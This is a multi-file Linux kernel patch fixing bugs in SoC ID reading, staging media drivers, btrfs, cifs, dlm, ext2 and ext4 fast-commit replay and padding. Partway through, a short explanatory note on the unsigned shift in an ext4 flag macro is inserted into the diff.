+@@ -167,20 +167,18 @@ ATTRIBUTE_GROUPS(ux500_soc);
+ static const char *db8500_read_soc_id(struct device_node *backupram)
+ {
+ 	void __iomem *base;
+-	void __iomem *uid;
+ 	const char *retstr;
++	u32 uid[5];
+ 
+ 	base = of_iomap(backupram, 0);
+ 	if (!base)
+ 		return NULL;
+-	uid = base + 0x1fc0;
++	memcpy_fromio(uid, base + 0x1fc0, sizeof(uid));
+ 
+ 	/* Throw these device-specific numbers into the entropy pool */
+-	add_device_randomness(uid, 0x14);
++	add_device_randomness(uid, sizeof(uid));
+ 	retstr = kasprintf(GFP_KERNEL, "%08x%08x%08x%08x%08x",
+-			 readl((u32 *)uid+0),
+-			 readl((u32 *)uid+1), readl((u32 *)uid+2),
+-			 readl((u32 *)uid+3), readl((u32 *)uid+4));
++			   uid[0], uid[1], uid[2], uid[3], uid[4]);
+ 	iounmap(base);
+ 	return retstr;
+ }
+diff --git a/drivers/staging/media/ipu3/ipu3-v4l2.c b/drivers/staging/media/ipu3/ipu3-v4l2.c
+index ce13e746c15f3..e530767e80a5d 100644
+--- a/drivers/staging/media/ipu3/ipu3-v4l2.c
++++ b/drivers/staging/media/ipu3/ipu3-v4l2.c
+@@ -188,6 +188,28 @@ static int imgu_subdev_set_fmt(struct v4l2_subdev *sd,
+ 	return 0;
+ }
+ 
++static struct v4l2_rect *
++imgu_subdev_get_crop(struct imgu_v4l2_subdev *sd,
++		     struct v4l2_subdev_state *sd_state, unsigned int pad,
++		     enum v4l2_subdev_format_whence which)
++{
++	if (which == V4L2_SUBDEV_FORMAT_TRY)
++		return v4l2_subdev_get_try_crop(&sd->subdev, sd_state, pad);
++	else
++		return &sd->rect.eff;
++}
++
++static struct v4l2_rect *
++imgu_subdev_get_compose(struct imgu_v4l2_subdev *sd,
++			struct v4l2_subdev_state *sd_state, unsigned int pad,
++			enum v4l2_subdev_format_whence which)
++{
++	if (which == V4L2_SUBDEV_FORMAT_TRY)
++		return v4l2_subdev_get_try_compose(&sd->subdev, sd_state, pad);
++	else
++		return &sd->rect.bds;
++}
++
+ static int imgu_subdev_get_selection(struct v4l2_subdev *sd,
+ 				     struct v4l2_subdev_state *sd_state,
+ 				     struct v4l2_subdev_selection *sel)
+@@ -200,18 +222,12 @@ static int imgu_subdev_get_selection(struct v4l2_subdev *sd,
+ 
+ 	switch (sel->target) {
+ 	case V4L2_SEL_TGT_CROP:
+-		if (sel->which == V4L2_SUBDEV_FORMAT_TRY)
+-			sel->r = *v4l2_subdev_get_try_crop(sd, sd_state,
+-							   sel->pad);
+-		else
+-			sel->r = imgu_sd->rect.eff;
++		sel->r = *imgu_subdev_get_crop(imgu_sd, sd_state, sel->pad,
++					       sel->which);
+ 		return 0;
+ 	case V4L2_SEL_TGT_COMPOSE:
+-		if (sel->which == V4L2_SUBDEV_FORMAT_TRY)
+-			sel->r = *v4l2_subdev_get_try_compose(sd, sd_state,
+-							      sel->pad);
+-		else
+-			sel->r = imgu_sd->rect.bds;
++		sel->r = *imgu_subdev_get_compose(imgu_sd, sd_state, sel->pad,
++						  sel->which);
+ 		return 0;
+ 	default:
+ 		return -EINVAL;
+@@ -223,10 +239,9 @@ static int imgu_subdev_set_selection(struct v4l2_subdev *sd,
+ 				     struct v4l2_subdev_selection *sel)
+ {
+ 	struct imgu_device *imgu = v4l2_get_subdevdata(sd);
+-	struct imgu_v4l2_subdev *imgu_sd = container_of(sd,
+-							struct imgu_v4l2_subdev,
+-							subdev);
+-	struct v4l2_rect *rect, *try_sel;
++	struct imgu_v4l2_subdev *imgu_sd =
++		container_of(sd, struct imgu_v4l2_subdev, subdev);
++	struct v4l2_rect *rect;
+ 
+ 	dev_dbg(&imgu->pci_dev->dev,
+ 		 "set subdev %u sel which %u target 0x%4x rect [%ux%u]",
+@@ -238,22 +253,18 @@ static int imgu_subdev_set_selection(struct v4l2_subdev *sd,
+ 
+ 	switch (sel->target) {
+ 	case V4L2_SEL_TGT_CROP:
+-		try_sel = v4l2_subdev_get_try_crop(sd, sd_state, sel->pad);
+-		rect = &imgu_sd->rect.eff;
++		rect = imgu_subdev_get_crop(imgu_sd, sd_state, sel->pad,
++					    sel->which);
+ 		break;
+ 	case V4L2_SEL_TGT_COMPOSE:
+-		try_sel = v4l2_subdev_get_try_compose(sd, sd_state, sel->pad);
+-		rect = &imgu_sd->rect.bds;
++		rect = imgu_subdev_get_compose(imgu_sd, sd_state, sel->pad,
++					       sel->which);
+ 		break;
+ 	default:
+ 		return -EINVAL;
+ 	}
+ 
+-	if (sel->which == V4L2_SUBDEV_FORMAT_TRY)
+-		*try_sel = sel->r;
+-	else
+-		*rect = sel->r;
+-
++	*rect = sel->r;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/staging/media/tegra-video/csi.c b/drivers/staging/media/tegra-video/csi.c
+index b26e44adb2be7..426e653bd55d5 100644
+--- a/drivers/staging/media/tegra-video/csi.c
++++ b/drivers/staging/media/tegra-video/csi.c
+@@ -433,7 +433,7 @@ static int tegra_csi_channel_alloc(struct tegra_csi *csi,
+ 	for (i = 0; i < chan->numgangports; i++)
+ 		chan->csi_port_nums[i] = port_num + i * CSI_PORTS_PER_BRICK;
+ 
+-	chan->of_node = node;
++	chan->of_node = of_node_get(node);
+ 	chan->numpads = num_pads;
+ 	if (num_pads & 0x2) {
+ 		chan->pads[0].flags = MEDIA_PAD_FL_SINK;
+@@ -448,6 +448,7 @@ static int tegra_csi_channel_alloc(struct tegra_csi *csi,
+ 	chan->mipi = tegra_mipi_request(csi->dev, node);
+ 	if (IS_ERR(chan->mipi)) {
+ 		ret = PTR_ERR(chan->mipi);
++		chan->mipi = NULL;
+ 		dev_err(csi->dev, "failed to get mipi device: %d\n", ret);
+ 	}
+ 
+@@ -640,6 +641,7 @@ static void tegra_csi_channels_cleanup(struct tegra_csi *csi)
+ 			media_entity_cleanup(&subdev->entity);
+ 		}
+ 
++		of_node_put(chan->of_node);
+ 		list_del(&chan->list);
+ 		kfree(chan);
+ 	}
+diff --git a/drivers/staging/media/tegra-video/csi.h b/drivers/staging/media/tegra-video/csi.h
+index 4ee05a1785cfa..6960ea2e3d360 100644
+--- a/drivers/staging/media/tegra-video/csi.h
++++ b/drivers/staging/media/tegra-video/csi.h
+@@ -56,7 +56,7 @@ struct tegra_csi;
+  * @framerate: active framerate for TPG
+  * @h_blank: horizontal blanking for TPG active format
+  * @v_blank: vertical blanking for TPG active format
+- * @mipi: mipi device for corresponding csi channel pads
++ * @mipi: mipi device for corresponding csi channel pads, or NULL if not applicable (TPG, error)
+  * @pixel_rate: active pixel rate from the sensor on this channel
+  */
+ struct tegra_csi_channel {
+diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c
+index 18374a6d05bdf..18cf801ab5908 100644
+--- a/fs/btrfs/backref.c
++++ b/fs/btrfs/backref.c
+@@ -433,6 +433,7 @@ static int add_all_parents(struct btrfs_root *root, struct btrfs_path *path,
+ 	u64 wanted_disk_byte = ref->wanted_disk_byte;
+ 	u64 count = 0;
+ 	u64 data_offset;
++	u8 type;
+ 
+ 	if (level != 0) {
+ 		eb = path->nodes[level];
+@@ -487,6 +488,9 @@ static int add_all_parents(struct btrfs_root *root, struct btrfs_path *path,
+ 			continue;
+ 		}
+ 		fi = btrfs_item_ptr(eb, slot, struct btrfs_file_extent_item);
++		type = btrfs_file_extent_type(eb, fi);
++		if (type == BTRFS_FILE_EXTENT_INLINE)
++			goto next;
+ 		disk_byte = btrfs_file_extent_disk_bytenr(eb, fi);
+ 		data_offset = btrfs_file_extent_offset(eb, fi);
+ 
+diff --git a/fs/btrfs/extent-io-tree.c b/fs/btrfs/extent-io-tree.c
+index 3676580c2d97e..7b93719a486c5 100644
+--- a/fs/btrfs/extent-io-tree.c
++++ b/fs/btrfs/extent-io-tree.c
+@@ -397,7 +397,7 @@ static int insert_state(struct extent_io_tree *tree,
+ 			u32 bits, struct extent_changeset *changeset)
+ {
+ 	struct rb_node **node;
+-	struct rb_node *parent;
++	struct rb_node *parent = NULL;
+ 	const u64 end = state->end;
+ 
+ 	set_state_bits(tree, state, bits, changeset);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 635f45f1a2ef8..dba087ad40ea2 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -7241,8 +7241,9 @@ static int read_one_chunk(struct btrfs_key *key, struct extent_buffer *leaf,
+ 			map->stripes[i].dev = handle_missing_device(fs_info,
+ 								    devid, uuid);
+ 			if (IS_ERR(map->stripes[i].dev)) {
++				ret = PTR_ERR(map->stripes[i].dev);
+ 				free_extent_map(em);
+-				return PTR_ERR(map->stripes[i].dev);
++				return ret;
+ 			}
+ 		}
+ 
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 712a431614480..6094cb2ff099b 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -678,9 +678,15 @@ cifs_show_options(struct seq_file *s, struct dentry *root)
+ 	seq_printf(s, ",echo_interval=%lu",
+ 			tcon->ses->server->echo_interval / HZ);
+ 
+-	/* Only display max_credits if it was overridden on mount */
++	/* Only display the following if overridden on mount */
+ 	if (tcon->ses->server->max_credits != SMB2_MAX_CREDITS_AVAILABLE)
+ 		seq_printf(s, ",max_credits=%u", tcon->ses->server->max_credits);
++	if (tcon->ses->server->tcp_nodelay)
++		seq_puts(s, ",tcpnodelay");
++	if (tcon->ses->server->noautotune)
++		seq_puts(s, ",noautotune");
++	if (tcon->ses->server->noblocksnd)
++		seq_puts(s, ",noblocksend");
+ 
+ 	if (tcon->snapshot_time)
+ 		seq_printf(s, ",snapshot=%llu", tcon->snapshot_time);
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 9db9527c61cfc..7e7f712f97fd8 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -279,8 +279,10 @@ cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+ 			tcon->need_reconnect = true;
+ 			tcon->status = TID_NEED_RECON;
+ 		}
+-		if (ses->tcon_ipc)
++		if (ses->tcon_ipc) {
+ 			ses->tcon_ipc->need_reconnect = true;
++			ses->tcon_ipc->status = TID_NEED_RECON;
++		}
+ 
+ next_session:
+ 		spin_unlock(&ses->chan_lock);
+@@ -1871,6 +1873,9 @@ cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 
+ 	cifs_dbg(FYI, "IPC tcon rc=%d ipc tid=0x%x\n", rc, tcon->tid);
+ 
++	spin_lock(&tcon->tc_lock);
++	tcon->status = TID_GOOD;
++	spin_unlock(&tcon->tc_lock);
+ 	ses->tcon_ipc = tcon;
+ out:
+ 	return rc;
+@@ -2157,7 +2162,7 @@ cifs_set_cifscreds(struct smb3_fs_context *ctx __attribute__((unused)),
+ struct cifs_ses *
+ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ {
+-	int rc = -ENOMEM;
++	int rc = 0;
+ 	unsigned int xid;
+ 	struct cifs_ses *ses;
+ 	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
+@@ -2206,6 +2211,8 @@ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 		return ses;
+ 	}
+ 
++	rc = -ENOMEM;
++
+ 	cifs_dbg(FYI, "Existing smb sess not found\n");
+ 	ses = sesInfoAlloc();
+ 	if (ses == NULL)
+@@ -2278,10 +2285,10 @@ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 	list_add(&ses->smb_ses_list, &server->smb_ses_list);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+-	free_xid(xid);
+-
+ 	cifs_setup_ipc(ses, ctx);
+ 
++	free_xid(xid);
++
+ 	return ses;
+ 
+ get_ses_fail:
+@@ -2600,6 +2607,7 @@ cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	tcon->nodelete = ctx->nodelete;
+ 	tcon->local_lease = ctx->local_lease;
+ 	INIT_LIST_HEAD(&tcon->pending_opens);
++	tcon->status = TID_GOOD;
+ 
+ 	/* schedule query interfaces poll */
+ 	INIT_DELAYED_WORK(&tcon->query_interfaces,
+diff --git a/fs/dlm/lowcomms.c b/fs/dlm/lowcomms.c
+index 59f64c596233b..871d4e9f49fb6 100644
+--- a/fs/dlm/lowcomms.c
++++ b/fs/dlm/lowcomms.c
+@@ -1543,7 +1543,11 @@ static void process_recv_sockets(struct work_struct *work)
+ 
+ static void process_listen_recv_socket(struct work_struct *work)
+ {
+-	accept_from_sock(&listen_con);
++	int ret;
++
++	do {
++		ret = accept_from_sock(&listen_con);
++	} while (!ret);
+ }
+ 
+ static void dlm_connect(struct connection *con)
+@@ -1820,7 +1824,7 @@ static int dlm_listen_for_all(void)
+ 	result = sock->ops->listen(sock, 5);
+ 	if (result < 0) {
+ 		dlm_close_sock(&listen_con.sock);
+-		goto out;
++		return result;
+ 	}
+ 
+ 	return 0;
+@@ -2023,7 +2027,6 @@ fail_listen:
+ 	dlm_proto_ops = NULL;
+ fail_proto_ops:
+ 	dlm_allow_conn = 0;
+-	dlm_close_sock(&listen_con.sock);
+ 	work_stop();
+ fail_local:
+ 	deinit_local();
+diff --git a/fs/ext2/dir.c b/fs/ext2/dir.c
+index 8f597753ac129..5202eddfc3c0a 100644
+--- a/fs/ext2/dir.c
++++ b/fs/ext2/dir.c
+@@ -679,7 +679,7 @@ int ext2_empty_dir (struct inode * inode)
+ 		page = ext2_get_page(inode, i, 0, &page_addr);
+ 
+ 		if (IS_ERR(page))
+-			goto not_empty;
++			return 0;
+ 
+ 		kaddr = page_addr;
+ 		de = (ext2_dirent *)kaddr;
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 8d5453852f98e..4e739902dc03a 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -558,7 +558,7 @@ enum {
+  *
+  * It's not paranoia if the Murphy's Law really *is* out to get you.  :-)
+  */
+-#define TEST_FLAG_VALUE(FLAG) (EXT4_##FLAG##_FL == (1 << EXT4_INODE_##FLAG))
++#define TEST_FLAG_VALUE(FLAG) (EXT4_##FLAG##_FL == (1U << EXT4_INODE_##FLAG))
+ #define CHECK_FLAG_VALUE(FLAG) BUILD_BUG_ON(!TEST_FLAG_VALUE(FLAG))
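
The U suffix matters because the inode flags reach bit 31 (EXT4_RESERVED_FL): with a plain int, 1 << 31 shifts into the sign bit, which is undefined behaviour in C, while the unsigned form is a well-defined 0x80000000.

	unsigned int ok = 1U << 31;	/* well-defined: 0x80000000 */
	/* int bad = 1 << 31; */	/* UB: shifts into the sign bit */
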
+ 
+ static inline void ext4_check_flag_values(void)
+@@ -2964,7 +2964,8 @@ int do_journal_get_write_access(handle_t *handle, struct inode *inode,
+ typedef enum {
+ 	EXT4_IGET_NORMAL =	0,
+ 	EXT4_IGET_SPECIAL =	0x0001, /* OK to iget a system inode */
+-	EXT4_IGET_HANDLE = 	0x0002	/* Inode # is from a handle */
++	EXT4_IGET_HANDLE = 	0x0002,	/* Inode # is from a handle */
++	EXT4_IGET_BAD =		0x0004  /* Allow to iget a bad inode */
+ } ext4_iget_flags;
+ 
+ extern struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+@@ -3619,8 +3620,8 @@ extern void ext4_initialize_dirent_tail(struct buffer_head *bh,
+ 					unsigned int blocksize);
+ extern int ext4_handle_dirty_dirblock(handle_t *handle, struct inode *inode,
+ 				      struct buffer_head *bh);
+-extern int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name,
+-			 struct inode *inode);
++extern int __ext4_unlink(struct inode *dir, const struct qstr *d_name,
++			 struct inode *inode, struct dentry *dentry);
+ extern int __ext4_link(struct inode *dir, struct inode *inode,
+ 		       struct dentry *dentry);
+ 
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 6c399a8b22b35..36225ef56b0cd 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -5799,6 +5799,14 @@ int ext4_clu_mapped(struct inode *inode, ext4_lblk_t lclu)
+ 	struct ext4_extent *extent;
+ 	ext4_lblk_t first_lblk, first_lclu, last_lclu;
+ 
++	/*
++	 * if data can be stored inline, the logical cluster isn't
++	 * mapped - no physical clusters have been allocated, and the
++	 * file has no extents
++	 */
++	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
++		return 0;
++
+ 	/* search for the extent closest to the first block in the cluster */
+ 	path = ext4_find_extent(inode, EXT4_C2B(sbi, lclu), NULL, 0);
+ 	if (IS_ERR(path)) {
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index cd0a861853e3f..7ada374ff27d7 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -1371,7 +1371,7 @@ retry:
+ 		if (count_reserved)
+ 			count_rsvd(inode, lblk, orig_es.es_len - len1 - len2,
+ 				   &orig_es, &rc);
+-		goto out;
++		goto out_get_reserved;
+ 	}
+ 
+ 	if (len1 > 0) {
+@@ -1413,6 +1413,7 @@ retry:
+ 		}
+ 	}
+ 
++out_get_reserved:
+ 	if (count_reserved)
+ 		*reserved = get_rsvd(inode, end, es, &rc);
+ out:
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 0f6d0a80467d7..7ed71c652f67f 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -420,25 +420,34 @@ static int __track_dentry_update(struct inode *inode, void *arg, bool update)
+ 	struct __track_dentry_update_args *dentry_update =
+ 		(struct __track_dentry_update_args *)arg;
+ 	struct dentry *dentry = dentry_update->dentry;
+-	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
++	struct inode *dir = dentry->d_parent->d_inode;
++	struct super_block *sb = inode->i_sb;
++	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 
+ 	mutex_unlock(&ei->i_fc_lock);
++
++	if (IS_ENCRYPTED(dir)) {
++		ext4_fc_mark_ineligible(sb, EXT4_FC_REASON_ENCRYPTED_FILENAME,
++					NULL);
++		mutex_lock(&ei->i_fc_lock);
++		return -EOPNOTSUPP;
++	}
++
+ 	node = kmem_cache_alloc(ext4_fc_dentry_cachep, GFP_NOFS);
+ 	if (!node) {
+-		ext4_fc_mark_ineligible(inode->i_sb, EXT4_FC_REASON_NOMEM, NULL);
++		ext4_fc_mark_ineligible(sb, EXT4_FC_REASON_NOMEM, NULL);
+ 		mutex_lock(&ei->i_fc_lock);
+ 		return -ENOMEM;
+ 	}
+ 
+ 	node->fcd_op = dentry_update->op;
+-	node->fcd_parent = dentry->d_parent->d_inode->i_ino;
++	node->fcd_parent = dir->i_ino;
+ 	node->fcd_ino = inode->i_ino;
+ 	if (dentry->d_name.len > DNAME_INLINE_LEN) {
+ 		node->fcd_name.name = kmalloc(dentry->d_name.len, GFP_NOFS);
+ 		if (!node->fcd_name.name) {
+ 			kmem_cache_free(ext4_fc_dentry_cachep, node);
+-			ext4_fc_mark_ineligible(inode->i_sb,
+-				EXT4_FC_REASON_NOMEM, NULL);
++			ext4_fc_mark_ineligible(sb, EXT4_FC_REASON_NOMEM, NULL);
+ 			mutex_lock(&ei->i_fc_lock);
+ 			return -ENOMEM;
+ 		}
+@@ -666,6 +675,15 @@ static void ext4_fc_submit_bh(struct super_block *sb, bool is_tail)
+ 
+ /* Ext4 commit path routines */
+ 
++/* memcpy to fc reserved space and update CRC */
++static void *ext4_fc_memcpy(struct super_block *sb, void *dst, const void *src,
++				int len, u32 *crc)
++{
++	if (crc)
++		*crc = ext4_chksum(EXT4_SB(sb), *crc, src, len);
++	return memcpy(dst, src, len);
++}
++
+ /* memzero and update CRC */
+ static void *ext4_fc_memzero(struct super_block *sb, void *dst, int len,
+ 				u32 *crc)
+@@ -691,62 +709,59 @@ static void *ext4_fc_memzero(struct super_block *sb, void *dst, int len,
+  */
+ static u8 *ext4_fc_reserve_space(struct super_block *sb, int len, u32 *crc)
+ {
+-	struct ext4_fc_tl *tl;
++	struct ext4_fc_tl tl;
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	struct buffer_head *bh;
+ 	int bsize = sbi->s_journal->j_blocksize;
+ 	int ret, off = sbi->s_fc_bytes % bsize;
+-	int pad_len;
++	int remaining;
++	u8 *dst;
+ 
+ 	/*
+-	 * After allocating len, we should have space at least for a 0 byte
+-	 * padding.
++	 * If 'len' is too long to fit in any block alongside a PAD tlv, then we
++	 * cannot fulfill the request.
+ 	 */
+-	if (len + EXT4_FC_TAG_BASE_LEN > bsize)
++	if (len > bsize - EXT4_FC_TAG_BASE_LEN)
+ 		return NULL;
+ 
+-	if (bsize - off - 1 > len + EXT4_FC_TAG_BASE_LEN) {
+-		/*
+-		 * Only allocate from current buffer if we have enough space for
+-		 * this request AND we have space to add a zero byte padding.
+-		 */
+-		if (!sbi->s_fc_bh) {
+-			ret = jbd2_fc_get_buf(EXT4_SB(sb)->s_journal, &bh);
+-			if (ret)
+-				return NULL;
+-			sbi->s_fc_bh = bh;
+-		}
++	if (!sbi->s_fc_bh) {
++		ret = jbd2_fc_get_buf(EXT4_SB(sb)->s_journal, &bh);
++		if (ret)
++			return NULL;
++		sbi->s_fc_bh = bh;
++	}
++	dst = sbi->s_fc_bh->b_data + off;
++
++	/*
++	 * Allocate the bytes in the current block if we can do so while still
++	 * leaving enough space for a PAD tlv.
++	 */
++	remaining = bsize - EXT4_FC_TAG_BASE_LEN - off;
++	if (len <= remaining) {
+ 		sbi->s_fc_bytes += len;
+-		return sbi->s_fc_bh->b_data + off;
++		return dst;
+ 	}
+-	/* Need to add PAD tag */
+-	tl = (struct ext4_fc_tl *)(sbi->s_fc_bh->b_data + off);
+-	tl->fc_tag = cpu_to_le16(EXT4_FC_TAG_PAD);
+-	pad_len = bsize - off - 1 - EXT4_FC_TAG_BASE_LEN;
+-	tl->fc_len = cpu_to_le16(pad_len);
+-	if (crc)
+-		*crc = ext4_chksum(sbi, *crc, tl, EXT4_FC_TAG_BASE_LEN);
+-	if (pad_len > 0)
+-		ext4_fc_memzero(sb, tl + 1, pad_len, crc);
++
++	/*
++	 * Else, terminate the current block with a PAD tlv, then allocate a new
++	 * block and allocate the bytes at the start of that new block.
++	 */
++
++	tl.fc_tag = cpu_to_le16(EXT4_FC_TAG_PAD);
++	tl.fc_len = cpu_to_le16(remaining);
++	ext4_fc_memcpy(sb, dst, &tl, EXT4_FC_TAG_BASE_LEN, crc);
++	ext4_fc_memzero(sb, dst + EXT4_FC_TAG_BASE_LEN, remaining, crc);
++
+ 	ext4_fc_submit_bh(sb, false);
+ 
+ 	ret = jbd2_fc_get_buf(EXT4_SB(sb)->s_journal, &bh);
+ 	if (ret)
+ 		return NULL;
+ 	sbi->s_fc_bh = bh;
+-	sbi->s_fc_bytes = (sbi->s_fc_bytes / bsize + 1) * bsize + len;
++	sbi->s_fc_bytes += bsize - off + len;
+ 	return sbi->s_fc_bh->b_data;
+ }
+ 
+-/* memcpy to fc reserved space and update CRC */
+-static void *ext4_fc_memcpy(struct super_block *sb, void *dst, const void *src,
+-				int len, u32 *crc)
+-{
+-	if (crc)
+-		*crc = ext4_chksum(EXT4_SB(sb), *crc, src, len);
+-	return memcpy(dst, src, len);
+-}
+-
+ /*
+  * Complete a fast commit by writing tail tag.
+  *
+@@ -774,7 +789,7 @@ static int ext4_fc_write_tail(struct super_block *sb, u32 crc)
+ 	off = sbi->s_fc_bytes % bsize;
+ 
+ 	tl.fc_tag = cpu_to_le16(EXT4_FC_TAG_TAIL);
+-	tl.fc_len = cpu_to_le16(bsize - off - 1 + sizeof(struct ext4_fc_tail));
++	tl.fc_len = cpu_to_le16(bsize - off + sizeof(struct ext4_fc_tail));
+ 	sbi->s_fc_bytes = round_up(sbi->s_fc_bytes, bsize);
+ 
+ 	ext4_fc_memcpy(sb, dst, &tl, EXT4_FC_TAG_BASE_LEN, &crc);
+@@ -784,6 +799,8 @@ static int ext4_fc_write_tail(struct super_block *sb, u32 crc)
+ 	dst += sizeof(tail.fc_tid);
+ 	tail.fc_crc = cpu_to_le32(crc);
+ 	ext4_fc_memcpy(sb, dst, &tail.fc_crc, sizeof(tail.fc_crc), NULL);
++	dst += sizeof(tail.fc_crc);
++	memset(dst, 0, bsize - off); /* Don't leak uninitialized memory. */
+ 
+ 	ext4_fc_submit_bh(sb, true);
+ 
+@@ -1388,7 +1405,7 @@ static int ext4_fc_replay_unlink(struct super_block *sb, struct ext4_fc_tl *tl,
+ 		return 0;
+ 	}
+ 
+-	ret = __ext4_unlink(NULL, old_parent, &entry, inode);
++	ret = __ext4_unlink(old_parent, &entry, inode, NULL);
+ 	/* -ENOENT ok coz it might not exist anymore. */
+ 	if (ret == -ENOENT)
+ 		ret = 0;
+@@ -1977,32 +1994,31 @@ void ext4_fc_replay_cleanup(struct super_block *sb)
+ 	kfree(sbi->s_fc_replay_state.fc_modified_inodes);
+ }
+ 
+-static inline bool ext4_fc_tag_len_isvalid(struct ext4_fc_tl *tl,
+-					   u8 *val, u8 *end)
++static bool ext4_fc_value_len_isvalid(struct ext4_sb_info *sbi,
++				      int tag, int len)
+ {
+-	if (val + tl->fc_len > end)
+-		return false;
+-
+-	/* Here only check ADD_RANGE/TAIL/HEAD which will read data when do
+-	 * journal rescan before do CRC check. Other tags length check will
+-	 * rely on CRC check.
+-	 */
+-	switch (tl->fc_tag) {
++	switch (tag) {
+ 	case EXT4_FC_TAG_ADD_RANGE:
+-		return (sizeof(struct ext4_fc_add_range) == tl->fc_len);
+-	case EXT4_FC_TAG_TAIL:
+-		return (sizeof(struct ext4_fc_tail) <= tl->fc_len);
+-	case EXT4_FC_TAG_HEAD:
+-		return (sizeof(struct ext4_fc_head) == tl->fc_len);
++		return len == sizeof(struct ext4_fc_add_range);
+ 	case EXT4_FC_TAG_DEL_RANGE:
++		return len == sizeof(struct ext4_fc_del_range);
++	case EXT4_FC_TAG_CREAT:
+ 	case EXT4_FC_TAG_LINK:
+ 	case EXT4_FC_TAG_UNLINK:
+-	case EXT4_FC_TAG_CREAT:
++		len -= sizeof(struct ext4_fc_dentry_info);
++		return len >= 1 && len <= EXT4_NAME_LEN;
+ 	case EXT4_FC_TAG_INODE:
++		len -= sizeof(struct ext4_fc_inode);
++		return len >= EXT4_GOOD_OLD_INODE_SIZE &&
++			len <= sbi->s_inode_size;
+ 	case EXT4_FC_TAG_PAD:
+-	default:
+-		return true;
++		return true; /* padding can have any length */
++	case EXT4_FC_TAG_TAIL:
++		return len >= sizeof(struct ext4_fc_tail);
++	case EXT4_FC_TAG_HEAD:
++		return len == sizeof(struct ext4_fc_head);
+ 	}
++	return false;
+ }
+ 
+ /*
+@@ -2040,7 +2056,7 @@ static int ext4_fc_replay_scan(journal_t *journal,
+ 	state = &sbi->s_fc_replay_state;
+ 
+ 	start = (u8 *)bh->b_data;
+-	end = (__u8 *)bh->b_data + journal->j_blocksize - 1;
++	end = start + journal->j_blocksize;
+ 
+ 	if (state->fc_replay_expected_off == 0) {
+ 		state->fc_cur_tag = 0;
+@@ -2061,11 +2077,12 @@ static int ext4_fc_replay_scan(journal_t *journal,
+ 	}
+ 
+ 	state->fc_replay_expected_off++;
+-	for (cur = start; cur < end - EXT4_FC_TAG_BASE_LEN;
++	for (cur = start; cur <= end - EXT4_FC_TAG_BASE_LEN;
+ 	     cur = cur + EXT4_FC_TAG_BASE_LEN + tl.fc_len) {
+ 		ext4_fc_get_tl(&tl, cur);
+ 		val = cur + EXT4_FC_TAG_BASE_LEN;
+-		if (!ext4_fc_tag_len_isvalid(&tl, val, end)) {
++		if (tl.fc_len > end - val ||
++		    !ext4_fc_value_len_isvalid(sbi, tl.fc_tag, tl.fc_len)) {
+ 			ret = state->fc_replay_num_tags ?
+ 				JBD2_FC_REPLAY_STOP : -ECANCELED;
+ 			goto out_err;
+@@ -2178,9 +2195,9 @@ static int ext4_fc_replay(journal_t *journal, struct buffer_head *bh,
+ #endif
+ 
+ 	start = (u8 *)bh->b_data;
+-	end = (__u8 *)bh->b_data + journal->j_blocksize - 1;
++	end = start + journal->j_blocksize;
+ 
+-	for (cur = start; cur < end - EXT4_FC_TAG_BASE_LEN;
++	for (cur = start; cur <= end - EXT4_FC_TAG_BASE_LEN;
+ 	     cur = cur + EXT4_FC_TAG_BASE_LEN + tl.fc_len) {
+ 		ext4_fc_get_tl(&tl, cur);
+ 		val = cur + EXT4_FC_TAG_BASE_LEN;
+@@ -2249,17 +2266,17 @@ void ext4_fc_init(struct super_block *sb, journal_t *journal)
+ 	journal->j_fc_cleanup_callback = ext4_fc_cleanup;
+ }
+ 
+-static const char *fc_ineligible_reasons[] = {
+-	"Extended attributes changed",
+-	"Cross rename",
+-	"Journal flag changed",
+-	"Insufficient memory",
+-	"Swap boot",
+-	"Resize",
+-	"Dir renamed",
+-	"Falloc range op",
+-	"Data journalling",
+-	"FC Commit Failed"
++static const char * const fc_ineligible_reasons[] = {
++	[EXT4_FC_REASON_XATTR] = "Extended attributes changed",
++	[EXT4_FC_REASON_CROSS_RENAME] = "Cross rename",
++	[EXT4_FC_REASON_JOURNAL_FLAG_CHANGE] = "Journal flag changed",
++	[EXT4_FC_REASON_NOMEM] = "Insufficient memory",
++	[EXT4_FC_REASON_SWAP_BOOT] = "Swap boot",
++	[EXT4_FC_REASON_RESIZE] = "Resize",
++	[EXT4_FC_REASON_RENAME_DIR] = "Dir renamed",
++	[EXT4_FC_REASON_FALLOC_RANGE] = "Falloc range op",
++	[EXT4_FC_REASON_INODE_JOURNAL_DATA] = "Data journalling",
